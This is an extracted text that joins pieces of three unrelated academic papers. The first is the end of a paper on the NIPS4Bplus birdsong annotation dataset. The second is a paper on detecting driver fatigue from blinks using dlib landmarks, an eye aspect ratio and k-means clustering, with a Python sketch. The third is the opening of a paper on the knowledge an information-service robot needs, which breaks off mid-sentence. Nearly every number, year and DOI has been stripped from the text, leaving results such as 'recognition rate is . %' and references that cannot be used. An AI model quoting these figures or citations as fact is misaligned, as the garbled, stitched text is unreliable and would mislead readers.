have a different set of species than the ones given in the original metadata. similarly, in a few rare occurrences, despite the tags suggesting a bird species active in a recording, the annotator was not able to detect any bird vocalisation. • an extra ‘unknown’ tag was added to the dataset for vocalisations that could not be classified to a class. • an extra ‘human’ tag was added to a few recordings that have very obvious human sounds, such as speech, present in them. 
• out of the recordings of the training set recordings contain only background noise, hence no temporal annotations were needed for them. • of the remaining recordings that contain vocalisations, six could not be unambiguously labelled due to hard to identify vocalisations, thus no temporal annotation files were produced for them. • an annotation file for any recording containing multiple insects does not differentiate between the insect species and the ‘unknown’ label was given to all insect species present. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure label co-occurrence heat map. distribution of number of active classes in dataset recordings. full-size doi: . /peerjcs. /fig- table an example of nips bplus temporal annotations. starting time (sec) duration (sec) tag . . serser_call . . ptehey_song . . carcar_call . . carcar_call . . serser_call . . ptehey_song • in the rare case where no birds were active along with the insects no annotation file was provided. hence, seven recordings containing only insects were left unlabelled. • in total, recordings have no temporal annotation files. these can be used when training a model that does not use temporal annotations. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure mean value and standard deviation of the duration of each class in nips bplus in seconds. blue bars indicate bird label, red bars indicate insect label and green indicate amphibian. full-size doi: . /peerjcs. /fig- figure total number of each class activations in nips bplus. blue bars indicate bird label, red bars indicate insect label and green indicate amphibian. full-size doi: . /peerjcs. /fig- • on some occasions, the different syllables of a song were separated in time into different events while in other occasions they were summarised into a larger event, according to the judgement of the expert annotator. this variety could help train an unbiased model regarding separating events or grouping them together as one continuous time event. as mentioned above, each recording may contain multiple species vocalising at the same time. this can often occur in wildlife recordings and is important to be taken into account when training a model. fig. presents the fraction of the total duration containing overlapping vocalisations as well as the number of simultaneously occurring classes. example uses of nips bplus a few examples of the nips bplus dataset and temporal annotations being used can be found in (morfi & stowell, a) and (morfi & stowell, b). first, in (morfi & stowell, a), we use nips bplus to carry out the training and evaluation of a newly proposed multi-instance learning (mil) loss function for audio event detection. and in (morfi & stowell, b), we combine the proposed method of (morfi & stowell, a) and a network trained on the nips bplus tags that performs audio tagging in a multi-task learning (mtl) setting. morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure number of simultaneous active classes over the total duration of the data. distribution of si- multaneous number of active classes on the total duration of the recordings. full-size doi: . /peerjcs. 
/fig- for both experiments, we split the nips b training dataset into a training set and a testing set. for our training set, the first recordings of the nips b training dataset are used, while the rest are included in our testing set, excluding recordings for which confident strong annotations could not be attained. those recordings are added to our training set resulting to a grand total of training recordings and testing recordings. out of the training recordings a small subset of them are used during training for validation purposes only. more specifically, the validation set consists of recordings ( containing at least one bird vocalisation, without any vocalisation), with the rest recordings ( containing at least one bird vocalisation, without any vocalisation) used only for training the model. detailed results can be found in morfi & stowell ( a) and morfi & stowell ( b). additional applications using nips bplus could include training models for bird species audio event detection and classification, evaluating how generalisable of method trained on a different set of data is, and many more. more specifically, the dataset and the temporal annotations can be used for evaluating methods that have been trained without temporally annotated data. in general, this kind of data, that lack temporal annotation, can be easily acquired in a large scale which is suitable for training deep learning approaches. however, temporally annotated data are needed to properly evaluate the performance of models that perform their prediction, hence another way of using nips bplus along with other datasets is as an evaluation set. conclusion in this paper, we present nips bplus, the first richly annotated birdsong audio dataset. nips bplus is comprised of the nips b dataset and tags used for the bird song morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. classification challenge plus the newly acquired temporal annotations. we provide statistical information about the recordings, their species specific tags and their temporal annotations. acknowledgements we thank sylvain vigant for providing recordings from central france, and biotope for making the data public for the nips b bird classification challenge. additional information and declarations funding dan stowell is supported by epsrc fellowship ep/l / . hanna pamuła is supported by agh-ust dean’s grant number . . . . sabiod mi cnrs provided financial support for the nips b challenge, and eadm madics cnrs provided anr- -ce - smiles supporting this research. grant disclosures the following grant information was disclosed by the authors: epsrc fellowship: ep/l / . agh-ust dean’s: . . . . nips b challenge. eadm madics cnrs: anr- -ce - . competing interests dan stowell is an academic editor for peerj. author contributions • veronica morfi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • yves bas, hanna pamuła and hervé glotin analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. 
• dan stowell conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the data is available at figshare: morfi, veronica; stowell, dan; pamula, hanna ( ): nips bplus: transcriptions of nips b bird challenge training dataset. figshare. dataset. https://doi.org/ . /m .figshare. . morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. http://dx.doi.org/ . /peerj-cs. references adavanne s, drossos k, Çakir e, virtanen t. . stacked convolutional and recurrent neural networks for bird audio detection. in: th european signal processing conference (eusipco). – doi . /eusipco. . . adavanne s, virtanen t. . sound event detection using weakly labeled dataset with stacked convolutional and recurrent neural network. in: proceedings of the detection and classification of acoustic scenes and events workshop (dcase ). – . arriaga jg, cody ml, vallejo ee, taylor ce. . bird-db: a database for annotated bird song sequences. ecological informatics : – doi . /j.ecoinf. . . . brandes ts. . automated sound recording and analysis techniques for bird surveys and conservation. bird conservation international—bird conserv int :s –s doi . /s . briggs f, lakshminarayanan b, neal l, fern x, raich r, hadley s. jk, hadley as, betts mg. . acoustic classification of multiple simultaneous bird species: a multi-instance multi-label approach. journal of the acoustic society of america : – . dawson dk, efford mg. . bird population density estimated from acoustic signals. journal of applied ecology ( ): – doi . /j. - . . .x. drake kl, frey m, hogan d, hedley r. . using digital recordings and sonogram analysis to obtain counts of yellow rails. wildlife society bulletin ( ): – doi . /wsb. . fanioudakis l, potamitis i. . deep networks tag the location of bird vocalisations on audio spectrograms. arxiv preprint. arxiv: . . glotin h, lecun y, artières t, mallat s, tchernichovski o, halkias x. . neural information processing scaled for bioacoustics—from neurons to big data. in: proceedings of neural information processing scaled for bioacoustics: from neurons to big data, . available at http://sabiod.univ-tln.fr/nips b _book.pdf . goëau h, glotin h, vellinga w-p, planqué r, joly a. . lifeclef bird identification task : the arrival of deep learning. in: clef ceur-ws, vol. . – . available at http://ceur-ws.org/vol- / . goëau h, glotin h, vellinga w-p, planqué r, joly a. . lifeclef bird identification task . in: clef ceur-ws, vol. . available at http://ceur-ws.org/vol- / . knight ec, hannah kc, foley g, scott c, brigham rm, bayne e. . recommen- dations for acoustic recognizer performance assessment with application to five common automated signal recognition programs. avian conservation and ecology ( ):article . kroodsma d. . the singing life of birds: audio cd. in: the singing life of birds: the art and science of listening to birdsong. houghton mifflin. kumar a, raj b. . audio event detection using weakly labeled data. new york: acm, – . morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /eusipco. . http://dx.doi.org/ . /j.ecoinf. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /wsb. http://arxiv.org/abs/ . 
http://sabiod.univ-tln.fr/nips b _book.pdf http://ceur-ws.org/vol- / http://ceur-ws.org/vol- / http://ceur-ws.org/vol- / http://dx.doi.org/ . /peerj-cs. lambert kta, mcdonald pg. . a low-cost, yet simple and highly repeatable system for acoustically surveying cryptic species. austral ecology ( ): – doi . /aec. . lostanlen v, salamon j, farnsworth a, kelling s, bello jp. . birdvox-full-night: a dataset and benchmark for avian flight call detection. in: proceedings of the ieee icassp. pistacaway: ieee. luther d. . signaller: receiver coordination and the timing of communication in amazonian birds. biology letters : – doi . /rsbl. . . luther d, wiley r. . production and perception of communicatory signals in a noisy environment. biology letters : – doi . /rsbl. . . marques ta, thomas l, martin sw, mellinger dk, ward ja, moretti dj, harris d, tyack pl. . estimating animal population density using passive acoustics. biological reviews ( ): – doi . /brv. . morfi v, stowell d. a. data-efficient weakly supervised learning for low-resource audio event detection using deep learning. in: proceedings of the detection and classification of acoustic scenes and events workshop (dcase ). – . morfi v, stowell d. b. deep learning for audio event detection and tagging on low- resource datasets. applied sciences ( ):article doi . /app . morfi v, stowell d, pamuła h. . transcriptions of nips b bird challenge training dataset. (accessed on july ) doi . /m .figshare. . pacifici k, simons tr, pollock kh. . effects of vegetation and background noise on the detection process in auditory avian point-count surveys. the auk ( ): – doi . /auk. . . pellegrini t. . densely connected cnns for bird audio detection. in: th european signal processing conference (eusipco). – doi . /eusipco. . . roger v, bartcus m, chamroukhi f, glotin h. . unsupervised bioacoustic seg- mentation by hierarchical dirichlet process hidden markov model. in: multimedia tools and applications for environmental & biodiversity informatics. cham: springer, – . ruiz-muñoz jf, orozco-alzate m, castellanos-dominguez g. . multiple instance learning-based birdsong classification using unsupervised recording segmentation. in: proceedings of the th international conference on artificial intelligence, ijcai’ . menlo park: aaai press, – . salamon j, bello jp. . deep convolutional neural networks and data augmentation for environmental sound classification. ieee signal processing letters : – doi . /lsp. . . schlüter j. . learning to pinpoint singing voice from weakly labeled examples. in: proceedings of the th international society for music information retrieval conference (ismir ). available at http://www.ofai.at/~jan.schlueter/pubs/ _ismir.pdf . sovern sg, forsman ed, olson gs, biswell bl, taylor m, anthony rg. . barred owls and landscape attributes influence territory occupancy of northern spotted owls. the journal of wildlife management ( ): – doi . /jwmg. . morfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /aec. http://dx.doi.org/ . /rsbl. . http://dx.doi.org/ . /rsbl. . http://dx.doi.org/ . /brv. http://dx.doi.org/ . /app http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /auk. . http://dx.doi.org/ . /eusipco. . http://dx.doi.org/ . /lsp. . http://www.ofai.at/~jan.schlueter/pubs/ _ismir.pdf http://dx.doi.org/ . /jwmg. http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . 
/ijanmc- - detection of blink state based on fatigued driving lei chao school of computer science and engineering, xi’an technological university xi’an, china e-mail:callofduty @ .com wang changyuan school of computer science and engineering, xi’an technological university xi’an, china e-mail:cyw @ .com li guang school of computer science and engineering, xi’an technological university xi’an, china e-mail: @qq.com shi lu school of computer science and engineering, xi’an technological university xi’an, china e-mail: @qq.com abstract—in recent years, with the improvement of the national economy, the penetration rate of automobiles has been increasing, and traffic accidents have also increased. fatigue driving is the main factor in many traffic accidents. fatigue driving can cause the driver's inattention, slow response, and make wrong decisions on danger signals, which affect the driver's personal safety. in modern development, driving safety is developing towards intelligence and safety. therefore, the detection of driver fatigue has become a generally accepted demand. this paper proposes a method to calculate the threshold of blinking, which can detect the blinking state of the driver in real time through video. during the driving process, when the driver is in the closed eye state for a long time, an early warning is issued to avoid the accident. this paper uses python language to achieve the first, through the digital image technology call dlib open source library to detect feature points of the face, and then measure the aspect ratio between the length and width of the human eye, and finally through the kmeans clustering algorithm to collect the ratio the analysis yields the blink threshold. the experimental results show that the recognition rate is . % when the video frame rate is , and the recognition accuracy is . %. the experimental results show that the method designed in this paper can quickly detect the fatigue characteristics of the human eye, has a higher recognition rate and accuracy for fatigue driving, and helps reduce the occurrence of traffic accidents. keywords-blinking algorithm; fatigue detection; digital image processing; clustering algorithm; key points of human eyes i. introduction with the improvement of people's material living standards, cars have become the main means of transportation for people, but the growing number of vehicles has led to more traffic accidents. according to statistics, fatigue driving is the main cause of traffic accidents[ , ].under normal circumstances, the medical community believes that there are two reasons for fatigue driving, one is because the driver's attention is too concentrated, and the other is that the body does not rest well. because of being in this state for a long time, the body will be fatigued, lose concentration, the driver will snoring, lose concentration, decrease the ability to judge dangerous situations, and cause traffic accidents. at present, there are relatively few applications of fatigue driving equipment in china's in-vehicle systems. fatigue detection mainly through facial features, eye and mouth features, human electrical signal characteristics and convolutional neural network characteristics[ , , ].the detection of facial features is generally based on the frequency of blinking eyes, the degree of mouth opening, and the frequency of head movements due to fatigue. 
the fatigue of human body electrical signals is generally the measurement of surface emg signals, because human fatigue can be expressed by muscle physiological information. surface emg signals can reflect real-time physiological processes of muscle information and physiological signals on the skin surface. convolutional neural networks generally extract facial features through image processing methods, and then extract the main features through convolutional layers, pooling layers, and fully connected layers to analyze and determine whether fatigue. chen[ ] uses the asm algorithm to accurately locate the eyes and mouth area, calculates the eye's aspect ratio, mouth height value, and black and white pixel ratio near the mouth, and obtains the blink frequency and mouth opening degree. the degree of mouth opening is used as an input to the fuzzy international journal of advanced network, monitoring and controls volume , no. , inference engine to obtain three types of fatigue levels to accurately quantify the degree of fatigue the method proposed in this paper is to judge the driver's fatigue driving according to the characteristics of the human eye. because the digital image processing open source visual library opencv comes with a human face detection library, but the disadvantage is that the lighting requirements are very high, the lighting slightly changed, it will be difficult to locate or inaccurate positioning[ ]. therefore, this paper chooses dlib open source library to detect human eye features. firstly, the face feature points provided by the dlib open source library are used to accurately calibrate the position of the face and the human eye, and then the aspect ratio between the length and the width of the human eye is measured. finally, the kmeans clustering algorithm is used to analyze the collected ratio. the threshold of blinking. figure below, a is the face feature points marked by dlib, and b is the feature point on the face of the paper. (a) feature points of a face annotation (b) recognition of face images figure . facial feature points ii. related work a. blink detection and threshold analysis methods this chapter mainly introduces the blink algorithm formula and blink threshold analysis method. the blink threshold analysis method uses the kmeans clustering algorithm in machine learning. there are many methods for blink detection, such as support vector machine classification, eye movement sequence analysis, convolutional neural network feature extraction, eye feature point analysis, etc. this article uses the eye feature analysis method. threshold analysis methods in machine learning usually use regression algorithms, decision tree methods, bayesian methods, and clustering algorithms. this article uses the kmeans clustering algorithm in machine learning. b. blinking formula there are currently many methods in the field of blink detection. andrej fogelto et al[ ] analyzed the relationship between the speed of blinking and the duration of time through the cyclic neural network (rnn), so as to better distinguish the state of blink and blink, through the comparison of one-way and two-way circulating neural networks. one-way neural networks work better in blink detection. however, neural networks have their own limitations. for example, network merging will lose a lot of information. in the field of face recognition, the relationship between part and whole is neglected, and each person's face features are different, so it takes a lot of time to train. parameter. 
ren anhu et al[ ] trained a blink classifier through the adaboost algorithm, but the adaboost algorithm is very sensitive to the discrete nature of blink data, and the detection of the eye region during image processing is easily affected by changes in lighting and by the speed of object movement, particularly because blinking is such a fast process. zeng youwen et al[ ] used the correlation between eeg signals and the number of blinks to determine the fatigue state, but the experiment required special equipment and the procedure was difficult to implement. the blinking algorithm proposed by soukupová[ ] measures the aspect ratio of the eye and analyzes the collected blink thresholds with a support vector machine[ ], finally obtaining an ear threshold of . . the algorithm in this paper likewise measures the aspect ratio of the eye, but uses the kmeans clustering algorithm from machine learning to obtain the blink threshold. as shown in figure (a), the absolute value of the longitudinal distance ab of the eye becomes smaller when the eye blinks, so at that moment the ratio of cd to ab suddenly becomes larger; we therefore analyze the threshold at which this ratio becomes larger during a blink. figure (a) shows the distances ab and cd, and (b) shows the positions of the eye feature points marked by dlib. this paper proposes the blink threshold formula as follows:

$$\mathrm{BlinkThreshold} = \frac{cd}{ab} = \frac{2\,\lVert p_1 - p_4 \rVert}{\lVert p_2 - p_6 \rVert + \lVert p_3 - p_5 \rVert}$$

figure . (a) the lateral distance is cd and the longitudinal distance is ab; (b) the dlib human eye calibration features.

c. kmeans clustering algorithm

the kmeans algorithm is a common clustering algorithm. its advantages are that it is easy to implement and understand and that it is fast to compute. the core idea is to calculate the distance between each sample point and the centroid of each cluster and to assign the sample point to the cluster whose centroid is closest. the similarity between samples in k-means is determined by the distance between them: the closer the distance, the higher the similarity. common distance measures include the euclidean distance and the manhattan distance; this paper uses the euclidean distance. in the cluster analysis, for two m-dimensional samples $x_i = (x_{i1}, x_{i2}, \dots, x_{im})$ and $x_j = (x_{j1}, x_{j2}, \dots, x_{jm})$, the distance is:

$$\mathrm{dist}_{ed}(x_i, x_j) = \sqrt{\sum_{k=1}^{m} (x_{ik} - x_{jk})^2}$$

the steps of the k-means algorithm are as follows: 1) randomly select the centroids of k clusters. 2) calculate the euclidean distance from each sample point to each centroid, assign the point to the cluster with the closest centroid, and then calculate the centroid of each new cluster. 3) after all the sample points have been assigned, recalculate the position of the centroid of each cluster, then iteratively calculate the distance from each sample point to the centroid of each cluster and re-assign the sample points. 4) repeat steps 2 and 3 until the assignment of all sample points no longer changes, at which point k-means has reached its solution. the main concern with this computation is to ensure the convergence of the algorithm. here, the squared error is calculated by the following formula, which shows that the clustering aims to minimize the sum of squared distances within each cluster:
$$J(c, u) = \sum_{i} \lVert x^{(i)} - u_{c^{(i)}} \rVert^{2}$$

here $J(c, u)$ is the sum of squared distances from each sample point to the centroid of its cluster, and $u_{c^{(i)}}$ is the centroid of the cluster to which the i-th sample belongs; the smaller $J(c, u)$ is, the smaller the distances between the sample points and their cluster centroids and the better the quality of the partition. the termination condition of the k-means algorithm is that $J(c, u)$ converges to a minimum. to perform the clustering, the optimum of this objective function is sought. taking a one-dimensional array as an example,

$$J = \sum_{i=1}^{k} \sum_{x_j \in u_i} (x_j - u_i)^2$$

differentiating this expression with respect to a cluster centre gives

$$\frac{\partial J}{\partial u_i} = \frac{\partial}{\partial u_i} \sum_{i=1}^{k} \sum_{x_j \in u_i} (x_j - u_i)^2 = -2 \sum_{x_j \in u_i} (x_j - u_i)$$

and setting $-2 \sum_{x_j \in u_i} (x_j - u_i) = 0$ yields $u_i = \frac{1}{|c_i|} \sum_{x_j \in u_i} x_j$, so the result of the optimization is simply the mean of each cluster. during the experiment, the algorithm may be too slow to produce useful results if the data set is too large; therefore, a maximum number of iterations or a threshold on the change of the cluster centres can be specified for the k-means algorithm. when the algorithm reaches the maximum number of iterations, or when the rate of change of the cluster centres falls below the threshold, the algorithm stops updating. the advantages of the k-means algorithm are that it is easy to understand, easy to implement and efficient to run; its disadvantages are that the greedy strategy used to cluster the sample points makes the algorithm prone to local convergence, that it is slower on big data, and that it is very sensitive to outliers and noise, so a small number of outliers or noise points can have a significant impact on the averaging step of the algorithm.

iii. the experiment

this section mainly covers two aspects: the source of the experimental data set, and the analysis of the experimental data. figure shows the author's own data collection and analysis: from left to right, the first plot is the analysis of the blink aspect-ratio values of the author's blinks, the middle plot is the blink data graph when the blink threshold is . with kmeans = , and the right image is the actual record of the author's experiment. figure shows the data of a random experimental sample from the public data set: from left to right, the first plot analyzes the blink aspect-ratio values of the blinks in the sample, the middle plot is the blink data graph at a threshold of . , and the right image is the actual record of the sample. this article uses the blink data set provided by zhejiang university[ ]. all the data in the data set were collected indoors under natural light, with no special illumination, using the ordinary camera built into a computer. there are video clips from participants, four segments per person; the four segments are: a. a front view without glasses; b. a front view with thin-rimmed glasses; c. a front view with black-framed glasses; d. an upward view. participants blinked spontaneously in front of the camera at normal speed. the size of each video is * , the frame rate of the video is fps, and the duration of each recording is generally about seconds. each participant usually blinks about to times, for a total of blinks. the following are the results of data collection and analysis.

figure . the author's blink aspect-ratio data, the blink data chart obtained with kmeans, and the recorded image of the author.
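before turning to the public data set, the measurement and thresholding pipeline of section ii can be sketched as follows. this is an illustrative sketch rather than the authors' code: it assumes dlib's standard 68-point landmark model (the model file name below is dlib's usual one), opencv for reading video frames and scikit-learn's kmeans; using two clusters and taking the midpoint between the two cluster centres as the blink threshold is an interpretation of the description above, not a detail given in the paper.

```python
# illustrative sketch of the blink-ratio measurement and k-means thresholding
# described in section ii. assumes dlib's 68-point landmark model and opencv;
# the two-cluster midpoint threshold is an interpretation, not the authors' code.
import cv2
import dlib
import numpy as np
from sklearn.cluster import KMeans

detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
RIGHT_EYE = list(range(36, 42))  # landmark indices of the right eye
LEFT_EYE = list(range(42, 48))   # landmark indices of the left eye

def eye_ratio(points):
    """lateral distance cd divided by the summed longitudinal distances ab."""
    p1, p2, p3, p4, p5, p6 = points
    lateral = np.linalg.norm(p1 - p4)
    longitudinal = np.linalg.norm(p2 - p6) + np.linalg.norm(p3 - p5)
    return 2.0 * lateral / max(longitudinal, 1e-6)

def collect_ratios(video_path):
    """run the landmark detector over a video and collect per-frame eye ratios."""
    ratios = []
    cap = cv2.VideoCapture(video_path)
    while True:
        ok, frame = cap.read()
        if not ok:
            break
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        for face in detector(gray):
            pts = predictor(gray, face)
            coords = np.array([[pts.part(i).x, pts.part(i).y] for i in range(68)])
            r = (eye_ratio(coords[LEFT_EYE]) + eye_ratio(coords[RIGHT_EYE])) / 2.0
            ratios.append(r)
    cap.release()
    return np.array(ratios)

def blink_threshold(ratios, n_clusters=2):
    """cluster the ratios (open vs. closed eyes) and take the midpoint between
    the two cluster centres as the blink threshold."""
    km = KMeans(n_clusters=n_clusters, n_init=10).fit(ratios.reshape(-1, 1))
    centres = np.sort(km.cluster_centers_.ravel())
    return float(centres.mean())

# example: thr = blink_threshold(collect_ratios("sample.avi"))
```

per-frame ratios above the threshold can then be treated as closed-eye frames, and a run of consecutive closed-eye frames counted as one blink.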
the following is the experimental data of the paper international journal of advanced network, monitoring and controls volume , no. , public data set times blinking eye aspect ratio data kmeans= , blinking data chart public data set sample figure . public data set sample the following table a is a comparison of the public data sets provided by zhejiang university and the experimental results of the text person. table b is a comparison of other methods with the method of this paper. renanhu[ ] trained the classifiers of blinking and closed eyes through the adaboosts algorithm. the person in the video is then tested for blinking. zhang wei[ ] performed a correlation analysis of the blink of the eye by analyzing the left forehead eeg signals attention and meditation and blink data. table i. compared with public datasets experimental sample 𝐁𝐥𝐢𝐧𝐤 𝐭𝐡𝐫𝐞𝐬𝐡𝐨𝐥𝐝 blink times number of recognition recognition rate text person . % public data set . . % table ii. compared with other literature literature recognition rate . % . % this article . % iv. conclusion this paper overcomes the shortcomings of digital image processing and opencv vision open source library, and combines the existing open source dlib machine learning library,the data between the vertical and horizontal ratio of blink is calculated by mathematical method, and the threshold value of the vertical and horizontal ratio of blink is analyzed by means of kmeans clustering algorithm in machine learning. according to the analysis of the public data set of zhejiang university, when the threshold value of the vertical and horizontal ratio of blink is . , the accurate recognition rate of blink is . %. through the experimental comparison, this algorithm can effectively detect the fatigue state of blink, which is more important this algorithm is fast, efficient and easy to transplant to various devices, and has great practical value in the field of fatigue driving. the shortcomings of the paper: for fatigue monitoring, not only eyes as a reference point, nose tip shaking, mouth opening and so on have an impact on face fatigue, so the fatigue detection algorithm in this paper needs to be improved. references [ ] m. hülsmann,d. donnermeyer,e. schäfer. a critical appraisal of studies on cyclic fatigue resistance of engine‐driven endodontic instruments[j]. international endodontic journal, , ( ). [ ] pierre thiffault,jacques bergeron. monotony of road environment and driver fatigue: a simulator study[j]. accident analysis and prevention, , ( ). international journal of advanced network, monitoring and controls volume , no. , [ ] liu longfei, wu shizhen, xu wangming. real-time detection method of fatigue driving based on face feature point analysis[j]. television technology, , ( ): - + . [ ] yan wang,rui huang,lei guo. eye gaze pattern analysis for fatigue detection based on gp-bcnn with esm[j]. pattern recognition letters, , . [ ] driver’s fatigue detection based on yawning extraction[j]. nawal alioua,aouatif amine,mohammed rziza,aboelmagd noureldin.international journal of vehicular technology. [ ] chen xin, li weixiang, li wei, zhang wenqing, zhu yuan. multi-feature fusion fatigue detection method based on improved asm [j]. computer engineering and design, , ( ): - . [ ] rafael c.gonzalez,richard e.woods.digital image processing,third edition[m], [ ] andrej fogelton,wanda benesova. eye blink completeness detection[j]. computer vision and image understanding, . [ ] ren anhu, liu bei. face recognition blink detection based on adaboost[j]. 
computer and digital engineering, , ( ): - . [ ] zeng youwen, feng zhen, zhu yabing, li qi.relationship between the number of blinks and fatigue based on eeg experiment[j].journal of changchun university of science and technology(natural science edition), , ( ): - . [ ] tereza soukupova ,́jan cˇ ech, eye blink detection using facial landmarks[j]. st computer vision winter workshop(cvww), [ ] j. manikandan,b. venkataramani. study and evaluation of a multi-class svm classifier using diminishing learning technique[j]. neurocomputing, , ( ). [ ] f.song, x.tan, x.liu and s.chen, eyes closeness detection from still images with multi-scale histograms of principal oriented gradients, pattern recognition, . [ ] zhang wei, he jian, zhang yan, zhou ming. a wearable fatigue driving detection system based on eeg and blink frequency[j]. computer engineering, , ( ): - + . https://kns.cnki.net/kcms/detail/detail.aspx?filename=sjhd &dbcode=sjhd what should we know to develop an information robot? submitted march accepted may published june corresponding author satoru satake, satoru@atr.jp academic editor yaochu jin additional information and declarations can be found on page doi . /peerj-cs. copyright satake et al. distributed under creative commons cc-by . open access what should we know to develop an information robot? satoru satake, keita nakatani, kotaro hayashi, takyuki kanda and michita imai atr intelligent robotics and communication laboratory, kyoto, japan abstract this paper is aimed at identifying the required knowledge for information robots. we addressed two aspects of this knowledge, ‘what should it know’ and ‘what should it do.’ the first part of this study was devoted to the former aspect. we investigated what information staff know and what people expect from information robots. we found that there are a lot of similarities. based on this, we developed a knowledge structure about an environment to be used to provide information. the developed knowledge structure worked well. in the field study we confirmed that the robot was able to answer most of the requests ( . %). however, regarding the latter aspect, although we initially replicated what human staff members do, the robot did not serve well. many users hesitated to speak, and remained quiet. here, we found that the knowledge for facilitating interaction was missing. we further designed the interaction flow to accommodate people who tend to be quiet. finally, our field study revealed that the improved interaction flow increased the success ratio of information providing from . % to . %. subjects robotics keywords information-providing, direction giving, belief about robots introduction direction giving is often considered as a desired task for social robots and embodied agents (cassell et al., ; kopp et al., ; ono, imai & ishiguro, ; okuno et al., ). in our daily life, one of the roles that frequently offer direction giving is information service (fig. ). such information booths/counters can be found in stations, airports, shopping malls, and sightseeing places. we wondered what would be the required ‘knowledge’ to develop for a robot that engages in such an information service. probably, most of us have experienced using information services, and many of us believe that we know what the information services are. thus, one would argue that it is just easy to develop such a robot. one might say that “i know from common sense what the information service is. i can just implement it.” is this true? 
we started the study with two research questions: • is our common knowledge about the tasks of information services (i.e., what they serve) applicable to information robot? how to cite this article satake et al. ( ), what should we know to develop an information robot? peerj comput. sci. :e ; doi . /peerj-cs. mailto:satoru@atr.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure information service. • can we create an information robot by replicating what human information staff knows and does? or, is there any missing knowledge? we first investigated what people would expect from an information robot, and confirmed that there are a lot of similarities with what human information staff does (section ‘information in a shopping mall’). thus, we decided to use knowledge about human information staff (what they know and what they do), and developed an information robot (section ‘system’). however, in regard to the second research question, the assumption was not true. thus, we further investigated missing knowledge (sections ‘preliminary trials: lack of ‘knowledge’ for interaction’ and ‘field experiment’). related works information-providing robots robots have been deployed as tour guides. there were a couple of museum robots that navigated around the environment and provided explanations (thrun et al., ). robots satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. are also used for interactive information-providing. for instance, gross et al. ( ) developed an article search robot which enables visitors to request an item and let the robot navigate to its location. input for these robots is often with guis, thus there are lists of destinations/items, one of which is chosen by the user. in contrast, in case of dialog-based system, the difficulty is to predict the set of requests users could ask. thus, there are assumptions made for the input, such as name of locations. for instance, a virtual agent, mack, developed by cassell et al. ( ) is able to respond with the names of locations and people in offices, and provide direction giving (kopp et al., ). but, in a real-world natural interaction, what users would ask for is not bound by such assumptions. in kanda et al. ( ), the robot provided direction-giving interaction in response to the name of locations in a shopping mall, and exceptions were handled by a human operator. that is, the system on its own did not address the questions beyond the assumptions. overall, in the previous studies, there was not much exploration for what people would ask/request in an information dialog with a robot. in contrast, we found that people ask various requests beyond the names of locations, and identified a required knowledge representation. direction-giving interaction it is reported that a good direction consists of pairs of actions and landmarks (daniel et al., ), such as “turn right at the post office, and . . . .” to provide such explanations, there is a technique to build a knowledge about spatial relationships among shops and corridors (morales et al., ). 
there are techniques to make a robot understand directions from humans (kollar et al., ); in the study of kollar and colleagues, the representation stores the relationship between the description of the entities in the space and the map. in these studies, the common assumption is that a system is able to provide directions if the name of a location is asked. in contrast, our study reveals other type of requests in information dialog, and we report on the required knowledge representation. note that it is well known in hri studies that gaze and pointing gestures make the interaction more natural and effective (e.g., sidner et al., ; mutlu, forlizzi & hodgins, ). the use of gesture in direction giving is also studied in conversational agents (kopp et al., ) as well as in human-like robots (ono, imai & ishiguro, ; okuno et al., ). our direction-giving behavior is informed by these studies. engagement in our study, we noticed some visitors remained silent, even after directly approaching the robot and hearing its requests to engage. relevant to this, there were studies about “engagement” process; that is, when people participate and feel connected in collaboration, their gaze will meet with each other and they do not quit the interaction (sidner, lee & lesh, ). rich and his colleagues developed a technique to detect engagement using people gaze (rich et al., ). kobayashi and his colleagues developed a technique to select a person to whom a robot should ask questions in multi-party interaction in the way a teacher appoints a student in a class for an answer (kobayashi et al., ). their technique satake et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. is based on the findings that people nodding and engaging in mutual gaze are more likely to answer than someone avoiding a meeting gaze. in contrast, the silent visitors in our study were people who voluntarily approached the robot. they typically behaved as if they were willing to interact with the robot but did not talk with it. knowledge representation there are several computer applications (e.g., google search or apple’s siri) that provide information related to location. there are many similar aspects between our robot and such applications, e.g., both need connection between language and local knowledge, interpretation needs to be contextual, and answers to be provided in verbal way. thus, similarly to these approaches, we used ontology (mcguinness & van harmelen, ) to build the knowledge representation. however, we need to build our own knowledge representation because required the knowledge structure is different, and we cannot simply apply existing software like google search and siri for the robot. for instance, robots can use pointing gesture (also, often robots are not equipped 